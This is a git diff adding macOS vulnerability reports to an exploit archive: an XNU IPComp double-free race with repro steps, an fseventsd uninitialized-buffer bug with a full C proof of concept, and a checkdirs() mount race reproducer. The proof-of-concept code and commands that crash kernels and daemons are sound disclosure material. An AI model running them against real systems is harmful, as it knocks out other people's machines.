+CarbonCore contains a large number of calls to unsafe string handling functions. It also performs a number of operations on file paths that might not be desirable in a remote context. I strongly recommend that this issue be resolved by removing CarbonCore from the NSURL deserialization path.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47207.zip
\ No newline at end of file
diff --git a/exploits/macos/dos/47479.txt b/exploits/macos/dos/47479.txt
new file mode 100644
index 000000000..a047e617e
--- /dev/null
+++ b/exploits/macos/dos/47479.txt
@@ -0,0 +1,264 @@
+=== Summary ===
+This report describes a bug in the XNU implementation of the IPComp protocol
+(https://tools.ietf.org/html/rfc3173). This bug can be remotely triggered by an
+attacker who is able to send traffic to a macOS system (iOS AFAIK isn't
+affected) *over two network interfaces at the same time*.
+
+
+=== Some basics to provide context ===
+IPComp is a protocol for compressing the payload of IP packets.
+
+The XNU implementation of IPComp is (going by the last public XNU release)
+enabled only on X86-64; ARM64 doesn't seem to have the feature enabled at all
+(look for ipcomp_zlib in config/MASTER.x86_64 and config/MASTER.arm64). In other
+words, it's enabled on macOS and disabled on iOS.
+
+While IPComp is related to IPsec, the IPComp input path processes input even
+when the user has not configured any IPsec stuff on the system.
+
+zlib requires fairly large buffers for decompression and especially for
+compression. In order to avoid allocating such buffers for each packet, IPComp
+uses two global z_stream instances "deflate_stream" and "inflate_stream".
+If IPComp isn't used, the buffer pointers in these z_stream instances remain
+NULL; only when IPComp is actually used, the kernel will attempt to initialize
+the buffer pointers.
+
+As far as I can tell, the IPComp implementation of XNU has been completely
+broken for years, which makes it impossible to actually reach the decompression
+code. ipcomp_algorithm_lookup() is responsible for allocating global buffers for
+the compression and decompression code; however, all of these allocations go
+through deflate_alloc(), which (since xnu-1228, which corresponds to macOS 10.5
+from 2007) calls _MALLOC() with M_NOWAIT. _MALLOC() leads to kalloc_canblock(),
+which, if the M_NOWAIT flag was set and the allocation is too big for a kalloc
+zone (size >= kalloc_max_prerounded), immediately returns NULL. On X86-64,
+kalloc_max_prerounded is 0x2001; both deflateInit2() and inflateInit2() attempt
+allocations bigger than that, causing them to fail with Z_MEM_ERROR, as is
+visible with dtrace when observing the system's reaction to a single incoming
+IPComp packet [empty lines removed]:
+
+```
+bash-3.2# ./inflate_test.dtrace
+dtrace: script './inflate_test.dtrace' matched 11 probes
+CPU     ID                    FUNCTION:NAME
+  0 243037              deflateInit2_:entry deflate init (thread=ffffff802db84a40)
+  0 224285            kalloc_canblock:entry kalloc_canblock(size=0x1738, canblock=0, site=ffffff8018e787e8)
+  0 224286           kalloc_canblock:return kalloc_canblock()=0xffffff80496b9800
+  0 224285            kalloc_canblock:entry kalloc_canblock(size=0x2000, canblock=0, site=ffffff8018e787e8)
+  0 224286           kalloc_canblock:return kalloc_canblock()=0xffffff802f42f000
+  0 224285            kalloc_canblock:entry kalloc_canblock(size=0x2000, canblock=0, site=ffffff8018e787e8)
+  0 224286           kalloc_canblock:return kalloc_canblock()=0x0
+  0 224285            kalloc_canblock:entry kalloc_canblock(size=0x20000, canblock=0, site=ffffff8018e787e8)
+  0 224286           kalloc_canblock:return kalloc_canblock()=0x0
+  0 224285            kalloc_canblock:entry kalloc_canblock(size=0x20000, canblock=0, site=ffffff8018e787e8)
+  0 224286           kalloc_canblock:return kalloc_canblock()=0x0
+  0 243038             deflateInit2_:return rval=0xfffffffc
+  0 243073              inflateInit2_:entry inflate init (thread=ffffff802db84a40)
+  0 224285            kalloc_canblock:entry kalloc_canblock(size=0x2550, canblock=0, site=ffffff8018e787e8)
+  0 224286           kalloc_canblock:return kalloc_canblock()=0x0
+  0 243074             inflateInit2_:return rval=0xfffffffc
+```
+
+(On iOS, the kalloc() limit seems to be higher, so if IPComp was built there,
+the input path might actually work?)
+
+
+=== main bug description ===
+IPComp uses a single global `static z_stream inflate_stream` for decompressing
+all incoming packets. This global is used without any locking. While processing
+of packets from a single interface seems to be single-threaded, packets arriving
+on multiple ethernet interfaces at the same time (or on an ethernet interface
+and a non-ethernet interface) can be processed in parallel (see
+dlil_create_input_thread() and its caller for the precise threading rules).
+Since zlib isn't designed for concurrent use of a z_stream, this leads to memory
+corruption.
+
+If IPComp actually worked, I believe that this bug would lead to
+things like out-of-bounds reads, out-of-bounds writes and use-after-frees.
+However, since IPComp never actually manages to set up the compression and
+decompression state, the bug instead manifests in the code that, for every
+incoming IPComp packet, attempts to set up the deflate buffers and tears down
+the successfully allocated buffers because some of the allocations failed:
+
+```
+int ZEXPORT
+deflateInit2_(z_streamp strm, int  level, int  method, int  windowBits,
+              int  memLevel, int  strategy, const char *version,
+              int stream_size)
+{
+    [...]
+    if (memLevel < 1 || memLevel > MAX_MEM_LEVEL || method != Z_DEFLATED ||
+        windowBits < 8 || windowBits > 15 || level < 0 || level > 9 ||
+        strategy < 0 || strategy > Z_FIXED) {
+        return Z_STREAM_ERROR;
+    }
+    if (windowBits == 8) windowBits = 9;  /* until 256-byte window bug fixed */
+    s = (deflate_state *) ZALLOC(strm, 1, sizeof(deflate_state));
+    if (s == Z_NULL) return Z_MEM_ERROR;
+    strm->state = (struct internal_state FAR *)s;
+    [...]
+    s->window = (Bytef *) ZALLOC(strm, s->w_size, 2*sizeof(Byte));
+    s->prev   = (Posf *)  ZALLOC(strm, s->w_size, sizeof(Pos));
+    s->head   = (Posf *)  ZALLOC(strm, s->hash_size, sizeof(Pos));
+
+    s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */
+
+    overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2);
+    s->pending_buf = (uchf *) overlay;
+    [...]
+    if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL ||
+        s->pending_buf == Z_NULL) {
+        [...]
+        deflateEnd (strm);
+        return Z_MEM_ERROR;
+    }
+    [...]
+}
+[...]
+int ZEXPORT
+deflateEnd(z_streamp strm)
+{
+    [...]
+    /* Deallocate in reverse order of allocations: */
+    TRY_FREE(strm, strm->state->pending_buf);
+    TRY_FREE(strm, strm->state->head);
+    TRY_FREE(strm, strm->state->prev);
+    TRY_FREE(strm, strm->state->window);
+
+    ZFREE(strm, strm->state);
+    strm->state = Z_NULL;
+
+    return status == BUSY_STATE ? Z_DATA_ERROR : Z_OK;
+}
+```
+
+When multiple executions of this code race, it is possible for two threads to
+free the same buffer, causing a double-free:
+
+```
+*** Panic Report ***
+panic(cpu 2 caller 0xffffff8012802df5): "zfree: double free of 0xffffff80285d9000 to zone kalloc.8192\n"@/BuildRoot/Library/Caches/com.apple.xbs/Sources/xnu/xnu-4903.261.4/osfmk/kern/zalloc.c:1304
+Backtrace (CPU 2), Frame : Return Address
+0xffffff912141b420 : 0xffffff80127aea2d mach_kernel : _handle_debugger_trap + 0x47d
+0xffffff912141b470 : 0xffffff80128e9e95 mach_kernel : _kdp_i386_trap + 0x155
+0xffffff912141b4b0 : 0xffffff80128db70a mach_kernel : _kernel_trap + 0x50a
+0xffffff912141b520 : 0xffffff801275bb40 mach_kernel : _return_from_trap + 0xe0
+0xffffff912141b540 : 0xffffff80127ae447 mach_kernel : _panic_trap_to_debugger + 0x197
+0xffffff912141b660 : 0xffffff80127ae293 mach_kernel : _panic + 0x63
+0xffffff912141b6d0 : 0xffffff8012802df5 mach_kernel : _zcram + 0xa15
+0xffffff912141b710 : 0xffffff8012804d4a mach_kernel : _zfree + 0x67a
+0xffffff912141b7f0 : 0xffffff80127bac58 mach_kernel : _kfree_addr + 0x68
+0xffffff912141b850 : 0xffffff8012dfc837 mach_kernel : _deflateEnd + 0x87
+0xffffff912141b870 : 0xffffff8012dfc793 mach_kernel : _deflateInit2_ + 0x253
+0xffffff912141b8c0 : 0xffffff8012c164a3 mach_kernel : _ipcomp_algorithm_lookup + 0x63
+0xffffff912141b8f0 : 0xffffff8012c16fb2 mach_kernel : _ipcomp4_input + 0x112
+0xffffff912141b990 : 0xffffff8012b89907 mach_kernel : _ip_proto_dispatch_in_wrapper + 0x1a7
+0xffffff912141b9e0 : 0xffffff8012b8bfa6 mach_kernel : _ip_input + 0x18b6
+0xffffff912141ba40 : 0xffffff8012b8a5a9 mach_kernel : _ip_input_process_list + 0xc69
+0xffffff912141bcb0 : 0xffffff8012aac3ed mach_kernel : _proto_input + 0x9d
+0xffffff912141bce0 : 0xffffff8012a76c41 mach_kernel : _ether_attach_inet + 0x471
+0xffffff912141bd70 : 0xffffff8012a6b036 mach_kernel : _dlil_rxpoll_set_params + 0x1b36
+0xffffff912141bda0 : 0xffffff8012a6aedc mach_kernel : _dlil_rxpoll_set_params + 0x19dc
+0xffffff912141bf10 : 0xffffff8012a692e9 mach_kernel : _ifp_if_ioctl + 0x10d9
+0xffffff912141bfa0 : 0xffffff801275b0ce mach_kernel : _call_continuation + 0x2e
+
+BSD process name corresponding to current thread: kernel_task
+Boot args: -zp -v keepsyms=1
+
+Mac OS version:
+18F132
+
+Kernel version:
+Darwin Kernel Version 18.6.0: Thu Apr 25 23:16:27 PDT 2019; root:xnu-4903.261.4~2/RELEASE_X86_64
+Kernel UUID: 7C8BB636-E593-3CE4-8528-9BD24A688851
+Kernel slide:     0x0000000012400000
+Kernel text base: 0xffffff8012600000
+__HIB  text base: 0xffffff8012500000
+System model name: Macmini7,1 (Mac-XXXXXXXXXXXXXXXX)
+```
+
+
+=== Repro steps ===
+You'll need a Mac (I used a Mac mini) and a Linux workstation.
+Stick two USB ethernet adapters into the Mac.
+Make sure that your Linux workstation has two free ethernet ports; if it
+doesn't, also stick USB ethernet adapters into your workstation.
+Take two ethernet cables; for both of them, stick one end into the Linux
+workstation and the other end into the Mac.
+Set up static IP addresses for both interfaces on the Linux box and the Mac. I'm
+using:
+
+ - Linux, first connection: 192.168.250.1/24
+ - Mac, first connection: 192.168.250.2/24
+ - Linux, second connection: 192.168.251.1/24
+ - Mac, second connection: 192.168.251.2/24
+
+On the Linux workstation, ping both IP addresses of the Mac, then dump the
+relevant ARP table entries:
+
+```
+$ ping -c1 192.168.250.2
+PING 192.168.250.2 (192.168.250.2) 56(84) bytes of data.
+64 bytes from 192.168.250.2: icmp_seq=1 ttl=64 time=0.794 ms
+[...]
+$ ping -c1 192.168.251.2
+PING 192.168.251.2 (192.168.251.2) 56(84) bytes of data.
+64 bytes from 192.168.251.2: icmp_seq=1 ttl=64 time=0.762 ms
+[...]
+$ arp -n | egrep '192\.168\.25[01]'
+192.168.250.2            ether   aa:aa:aa:aa:aa:aa   C                     eth0
+192.168.251.2            ether   bb:bb:bb:bb:bb:bb   C                     eth1
+$ 
+```
+
+On the Linux workstation, build the attached ipcomp_uaf.c and run it:
+
+```
+$ gcc -o ipcomp_recursion ipcomp_recursion.c -Wall
+$ sudo bash
+# ./ipcomp_uaf
+usage: ./ipcomp_uaf <if1> <target_mac1> <src_ip1> <dst_ip1> <if2> <target_mac2> <src_ip2> <dst_ip2>
+# ./ipcomp_uaf eth0 aa:aa:aa:aa:aa:aa 192.168.250.1 192.168.250.2 eth1 bb:bb:bb:bb:bb:bb 192.168.251.1 192.168.251.2
+```
+
+After something like a second, you should be able to observe that the Mac panics.
+I have observed panics via double-free and via null deref triggered by the PoC.
+(Stop the PoC afterwards, otherwise it'll panic again as soon as the network
+interfaces are up.)
+
+(The PoC also works if you use broadcast addresses as follows: ```
+# ./ipcomp_uaf eth0 ff:ff:ff:ff:ff:ff 0.0.0.0 255.255.255.255 eth1 ff:ff:ff:ff:ff:ff 0.0.0.0 255.255.255.255
+```)
+
+
+=== Fixing the bug ===
+I believe that by far the best way to fix this issue is to rip out the entire
+feature. Unless I'm missing some way for the initialization to succeed, it looks
+like nobody can have successfully used this feature in the last few years; and
+apparently nobody felt strongly enough about that to get the feature fixed.
+At the same time, this thing is remote attack surface in the IP stack, and it
+looks like it has already led to a remote DoS bug in the past - the first search
+result on bing.com for both "ipcomp macos" and "ipcomp xnu" is
+<https://www.exploit-db.com/exploits/5191>.
+
+In case you decide to fix the bug in a different way, please note:
+
+ - I believe that this can *NOT* be fixed by removing the PR_PROTOLOCK flag from
+   the entries in `inetsw` and `inet6sw`. While removal of that flag would cause
+   the input code to take the domain mutex before invoking the protocol handler,
+   IPv4 and IPv6 are different domains, and so concurrent processing of
+   IPv4+IPComp and IPv6+IPComp packets would probably still trigger the bug.
+ - If you decide to fix the memory allocation of IPComp so that the input path
+   works again (please don't - you'll never again have such a great way to prove
+   that nobody is using that code), I think another bug will become reachable:
+   I don't see anything that prevents unbounded recursion between
+   ip_proto_dispatch_in() and ipcomp4_input() using an IP packet with a series
+   of IPComp headers, which would be usable to cause a kernel panic via stack
+   overflow with a single IP packet.
+   In case you want to play with that, I wrote a PoC that generates packets with
+   100 such headers and attached it as ipcomp_recursion.c.
+   (The other IPv6 handlers for pseudo-protocols like IPPROTO_FRAGMENT seem to
+   avoid this problem by having the )
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47479.zip
\ No newline at end of file
diff --git a/exploits/macos/dos/47578.c b/exploits/macos/dos/47578.c
new file mode 100644
index 000000000..d7212996c
--- /dev/null
+++ b/exploits/macos/dos/47578.c
@@ -0,0 +1,237 @@
+# Exploit Title: Apple macOS 10.15.1 - Denial of Service (PoC)
+# Date: 2019-11-02
+# Exploit Author: 08Tc3wBB
+# Vendor Homepage: Apple
+# Software Link:
+# Version: Apple macOS < 10.15.1 / iOS < 13.2
+# Tested on: Tested on macOS 10.14.6 and iOS 12.4.1
+# CVE : N/A
+# Type : DOS
+# https://support.apple.com/en-us/HT210721
+
+----- Execution file path:
+  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd
+
+fseventsd running as root and unsandboxed on both iOS and macOS, and accessible from within the Application sandbox.
+
+----- Analysis
+
+Env: macOS 10.14.6
+I named following pseudocode functions to help you understand the execution flow.
+
+void __fastcall routine_1(mach_msg_header_t *msg, mach_msg_header_t *reply) // 0x100001285
+{
+  ...
+  v9 = implementation_register_rpc(
+         msg->msgh_local_port,
+         msg[1].msgh_size,
+         msg[4].msgh_reserved,               
+         (unsigned int)msg[4].msgh_id,
+         *(_QWORD *)&msg[1].msgh_reserved,      // input_mem1
+         msg[2].msgh_size >> 2,                 // input_mem1_len
+         *(_QWORD *)&msg[2].msgh_remote_port,   // input_mem2
+         msg[2].msgh_id,                        // input_mem2_len
+         msg[5].msgh_remote_port,
+         *(_QWORD *)&msg[3].msgh_bits,          // input_mem3
+         msg[3].msgh_local_port >> 2,           // input_mem3_len
+         *(_QWORD *)&msg[3].msgh_reserved,      // input_mem4
+         msg[4].msgh_size);                     // input_mem4_len
+  ...
+}
+routine_1 will be executed when user send mach_msg to Mach Service "com.apple.FSEvents" with id 0x101D0
+
+And routine_1 internally invokes a function called fsevent_add_client to process data included in input_mem1/input_mem2
+
+I marked five places with: (1) (2) (3) (4) (5)
+These are the essential points cause this vulnerability.
+
+void *fsevent_add_client(...)
+{
+  ...
+  v25 = malloc(8LL * input_mem1_len); // (1) Allocate a new buffer with input_mem1_len, didn't initializing its content.
+  *(_QWORD *)(eventobj + 136) = v25; // Subsequently insert that new buffer into (eventobj + 136)
+  ...
+
+  v20 = ... // v20 point to an array of strings that was created based on user input
+
+  // The following process is doing recursive parsing to v20
+
+  index = 0LL;
+  while ( 1 )
+  {
+    v26 = *(const char **)(v20 + 8 * index);
+   
+    ...
+
+    v28 = strstr(*(const char **)(v20 + 8 * index), "/.docid");
+    v27 = v26;
+    if ( !v28 ) // (2) If input string doesn't contain "/.docid", stop further parse, go straight to strdup
+      goto LABEL_15;
+
+    if ( strcmp(v28, "/.docid") ) // (3) If an input string doesn't exactly match "/.docid", goto LABEL_16
+      goto LABEL_16;
+
+    *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(".docid");
+
+LABEL_17:
+    if ( ++index >= input_mem1_len )
+      goto LABEL_21;
+  }
+
+  v27 = *(const char **)(v20 + 8 * index);
+LABEL_15:
+  *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) = strdup(v27);
+
+
+LABEL_16:
+  if ( *(_QWORD *)(*(_QWORD *)(eventobj + 136) + 8 * index) )
+    goto LABEL_17; // (4) So far the new buffer has never been initialized, but if it contain any wild value, it will goto LABEL_17, which program will retain that wild value and go on to parse next input_string
+  ...
+
+
+  // (5) Since all values saved in the new buffer supposed to be the return value of strdup, they will all be free'd later on. So if spray works successfully, the attacker can now has the ability to call free() on any address, further develop it to modify existing memory data.
+}
+
+However there is a catch, fseventsd only allow input_mem1_len be 1 unless the requested proc has root privilege, led to the size of uninitialized buffer can only be 8, such small size caused it very volatile, hard to apply desired spray work unless discover something else to assist. Or exploit another system proc (sandboxed it's okay), and borrow their root credential to send the exploit msg.
+
+----- PoC
+
+// clang poc.c -framework CoreFoundation -o poc
+
+#include <stdio.h>
+#include <xpc/xpc.h>
+#include <CoreFoundation/CoreFoundation.h>
+#include <bootstrap.h>
+
+mach_port_t server_port = 0;
+mach_port_t get_server_port(){
+    if(server_port)
+        return server_port;
+    bootstrap_look_up(bootstrap_port, "com.apple.FSEvents", &server_port);
+    return server_port;
+}
+
+int trigger_bug = 0;
+int has_reach_limit = 0;
+uint32_t call_routine_1(){
+   
+    struct SEND_Msg{
+        mach_msg_header_t Head;
+        mach_msg_body_t msgh_body;
+        mach_msg_port_descriptor_t port;
+        mach_msg_ool_descriptor_t mem1;
+        mach_msg_ool_descriptor_t mem2;
+        mach_msg_ool_descriptor_t mem3;
+        mach_msg_ool_descriptor_t mem4;
+        // Offset to here : +104
+       
+        uint64_t unused_field1;
+        uint32_t input_num1; // +112
+        uint32_t input_num2; // +116
+        uint64_t len_auth1; // +120 length of mem1/mem2
+        uint32_t input_num3; // +128
+        uint64_t len_auth2; // +132 length of mem3/mem4
+       
+        char unused_field[20];
+    };
+   
+    struct RECV_Msg{
+        mach_msg_header_t Head; // Size: 24
+        mach_msg_body_t msgh_body;
+        mach_msg_port_descriptor_t port;
+        uint64_t NDR_record;
+    };
+   
+    struct SEND_Msg *msg = malloc(0x100);
+    bzero(msg, 0x100);
+   
+    msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND);
+    msg->Head.msgh_size = 160;
+    int kkk = get_server_port();
+    msg->Head.msgh_remote_port = kkk;
+    msg->Head.msgh_local_port = mig_get_reply_port();
+    msg->Head.msgh_id = 0x101D0;
+    msg->msgh_body.msgh_descriptor_count = 5;
+   
+    msg->port.type = MACH_MSG_PORT_DESCRIPTOR;
+    msg->mem1.deallocate = false;
+    msg->mem1.copy = MACH_MSG_VIRTUAL_COPY;
+    msg->mem1.type = MACH_MSG_OOL_DESCRIPTOR;
+    memcpy(&msg->mem2, &msg->mem1, sizeof(msg->mem1));
+    memcpy(&msg->mem3, &msg->mem1, sizeof(msg->mem1));
+    memcpy(&msg->mem4, &msg->mem1, sizeof(msg->mem1));
+   
+    mach_port_t port1=0;
+    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port1);
+   
+    msg->port.name = port1;
+    msg->port.disposition = MACH_MSG_TYPE_MAKE_SEND;
+   
+    uint64_t empty_data = 0;
+    if(trigger_bug){
+       
+        msg->input_num1 = 5;
+       
+        msg->mem1.address = &empty_data;
+        msg->mem1.size = 4;
+        msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
+       
+        msg->mem2.address = "/.docid1";
+        msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
+    }
+    else{
+        msg->input_num1 = 1;
+       
+        msg->mem1.address = &empty_data;
+        msg->mem1.size = 4;
+        msg->input_num2 = msg->mem1.size >> 2; // input_mem1_len_auth
+       
+        msg->mem2.address = "/.dacid1";
+        msg->mem2.size = (mach_msg_size_t)strlen(msg->mem2.address) + 1;
+    }
+   
+    msg->mem3.address = 0;
+    msg->mem3.size = 0;
+    msg->input_num3 = msg->mem3.size >> 2; // input_mem3_len_auth
+   
+    msg->mem4.address = 0;
+    msg->mem4.size = 0;
+   
+    msg->len_auth1 = ((uint64_t)msg->mem2.size << 32) | (msg->mem1.size >> 2);
+    msg->len_auth2 = ((uint64_t)msg->mem4.size << 32) | (msg->mem3.size >> 2);
+   
+    mach_msg((mach_msg_header_t*)msg, MACH_SEND_MSG|(trigger_bug?0:MACH_RCV_MSG), msg->Head.msgh_size, 0x100, msg->Head.msgh_local_port, 0, 0);
+   
+    int32_t errCode = *(int32_t*)(((char*)msg) + 0x20);
+    if(errCode == -21){
+        has_reach_limit = 1;
+    }
+   
+    mig_dealloc_reply_port(msg->Head.msgh_local_port);
+    struct RECV_Msg *recv_msg = (void*)msg;
+   
+    uint32_t return_port = recv_msg->port.name;
+    free(msg);
+   
+    return return_port;
+}
+
+int main(int argc, const char * argv[]) {
+  
+    printf("PoC started running...\n");
+   
+    uint32_t aaa[1000];
+    for(int i=0; i<=1000; i++){
+        if(has_reach_limit){
+            trigger_bug = 1;
+            call_routine_1();
+            break;
+        }
+        aaa[i] = call_routine_1();
+    }
+   
+    printf("Finished\n");
+    printf("Check crash file beneath /Library/Logs/DiagnosticReports/\n");
+   
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/macos/dos/47592.txt b/exploits/macos/dos/47592.txt
new file mode 100644
index 000000000..efb5ea22a
--- /dev/null
+++ b/exploits/macos/dos/47592.txt
@@ -0,0 +1,250 @@
+On macOS, when a new mount point is created, the kernel uses checkdirs() to, as
+a comment above the function explains: "Scan all active processes to see if any
+of them have a current or root directory onto which the new filesystem has just
+been mounted. If so, replace them with the new mount point."
+
+In other words, XNU behaves as follows:
+
+$ hdiutil attach ./mount_cwd.img -nomount
+/dev/disk2
+$ cd mnt
+$ ls -l
+total 0
+-rw-r--r--  1 projectzero  staff  0 Aug  6 18:05 underlying
+$ mount -t msdos -o nobrowse /dev/disk2 .
+$ ls -l
+total 0
+-rwxrwxrwx  1 projectzero  staff  0 Aug  6 18:04 onfat
+$
+
+(This is different from e.g. Linux, where the cwd would still point to the
+directory on the root filesystem that is now covered by the mountpoint, and the
+second "ls -l" would show the same output as the first one.)
+
+
+checkdirs() uses proc_iterate() to execute checkdirs_callback() on each running
+process. checkdirs_callback() is implemented as follows:
+
+======================================================
+static int
+checkdirs_callback(proc_t p, void * arg)
+{
+        struct cdirargs * cdrp = (struct cdirargs * )arg;
+        vnode_t olddp = cdrp->olddp;
+        vnode_t newdp = cdrp->newdp;
+        struct filedesc *fdp;
+        vnode_t tvp;
+        vnode_t fdp_cvp;
+        vnode_t fdp_rvp;
+        int cdir_changed = 0;
+        int rdir_changed = 0;
+
+        /*
+         * XXX Also needs to iterate each thread in the process to see if it
+         * XXX is using a per-thread current working directory, and, if so,
+         * XXX update that as well.
+         */
+
+        proc_fdlock(p);
+        fdp = p->p_fd;
+        if (fdp == (struct filedesc *)0) {
+                proc_fdunlock(p);
+                return(PROC_RETURNED);
+        }
+        fdp_cvp = fdp->fd_cdir;
+        fdp_rvp = fdp->fd_rdir;
+        proc_fdunlock(p);
+
+        if (fdp_cvp == olddp) {
+                vnode_ref(newdp);
+                tvp = fdp->fd_cdir;
+                fdp_cvp = newdp;
+                cdir_changed = 1;
+                vnode_rele(tvp);
+        }
+        if (fdp_rvp == olddp) {
+                vnode_ref(newdp);
+                tvp = fdp->fd_rdir;
+                fdp_rvp = newdp;
+                rdir_changed = 1;
+                vnode_rele(tvp);
+        }
+        if (cdir_changed || rdir_changed) {
+                proc_fdlock(p);
+                fdp->fd_cdir = fdp_cvp;
+                fdp->fd_rdir = fdp_rvp;
+                proc_fdunlock(p);
+        }
+        return(PROC_RETURNED);
+}
+======================================================
+
+`p->p_fd` contains the current working directory (`->fd_cdir`) and
+root directory (`->fd_rdir`) of the process; it is protected against
+modification by proc_fdlock()/proc_fdunlock(). Because checkdirs_callback()
+does not hold that lock across the entire operation, several races are possible;
+for example:
+
+ - If `fdp->fd_cdir == olddp` is true and `fdp->fd_cdir` changes between the
+   read `tvp = fdp->fd_cdir;` and the second `proc_fdlock(p);`,
+   `vnode_rele(tvp);` will release a nonexistent reference, leading to reference
+   count underflow.
+ - If `fdp->fd_cdir == olddp` is true and the process calls chroot() between the
+   first locked region and the second locked region, a dangling pointer will be
+   written back to `fdp->fd_rdir`.
+
+
+I have written a simple reproducer for the first scenario; however, since the
+race window is quite narrow, it uses dtrace to make the race easier to hit (so
+you have to turn off SIP).
+
+
+To prepare an empty FAT32 filesystem and the PoC:
+======================================================
+Projects-Mac-mini:mount_cwd projectzero$ base64 -D | gunzip > mount_cwd.img
+H4sIAI3cSV0CA+3TLUsEcRAH4PUQlBMPk2Dyj82yoNmgQZsv4bQIwsrt6XLn7nG75cDgR/BziEls
+ghiu3rewXTGa1C0GszafZwZm4NcGZrp1e9XrlnE3qaLG7EzUqGv+vRGFaDv6dhOtb40fxgeH4WBn
+fzfU9nbaG5v1bK0+n17fr71UCyePrae5aLJ0Nn3bfJ0sT1amH+3LrAx150UVknBeFFVy3k9DJyt7
+cQhH/TQp05DlZTr8kXf7xWAwCkneWWwOhmlZ1uso9NJRqIpQDevkIsnyEMdxWGxG/Mbx3fvnpzPA
+P+X/AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+EtfAgGlzAAA
+EAA=
+Projects-Mac-mini:mount_cwd projectzero$ 
+Projects-Mac-mini:mount_cwd projectzero$ cat > flipflop2.c
+#include <fcntl.h>
+#include <err.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main(void) {
+  int outer_fd = open(".", O_RDONLY);
+  if (outer_fd == -1) err(1, "open outer");
+  int inner_fd = open("mnt", O_RDONLY);
+  if (inner_fd == -1) err(1, "open inner");
+
+  while (1) {
+    if (fchdir(inner_fd)) perror("chdir 1");
+    if (fchdir(outer_fd)) perror("chdir 2");
+  }
+}
+Projects-Mac-mini:mount_cwd projectzero$ cc -o flipflop2 flipflop2.c
+Projects-Mac-mini:mount_cwd projectzero$ cat > mountloop.c
+#include <stdlib.h>
+#include <stdio.h>
+#include <err.h>
+
+int main(int argc, char **argv) {
+  char mount_cmd[1000];
+  sprintf(mount_cmd, "mount -t msdos -o nobrowse %s mnt", argv[1]);
+  while (1) {
+    if (system(mount_cmd) != 0)
+      errx(1, "mount failed");
+umount:;
+    if (system("umount mnt")) {
+      puts("umount failed");
+      goto umount;
+    }
+  }
+}
+Projects-Mac-mini:mount_cwd projectzero$ cc -o mountloop mountloop.c
+Projects-Mac-mini:mount_cwd projectzero$ 
+Projects-Mac-mini:mount_cwd projectzero$ cat > test.dtrace
+#!/usr/sbin/dtrace -w -s
+
+__mac_mount:entry  { mount_pending = 1; }
+__mac_mount:return { mount_pending = 0; }
+proc_iterate:entry  { in_proc_iterate = 1; }
+proc_iterate:return { in_proc_iterate = 0; }
+
+vnode_rele_internal:entry {
+  if (mount_pending && in_proc_iterate) {
+    chill(1000*1000*10);
+  }
+}
+Projects-Mac-mini:mount_cwd projectzero$ 
+Projects-Mac-mini:mount_cwd projectzero$ chmod +x test.dtrace 
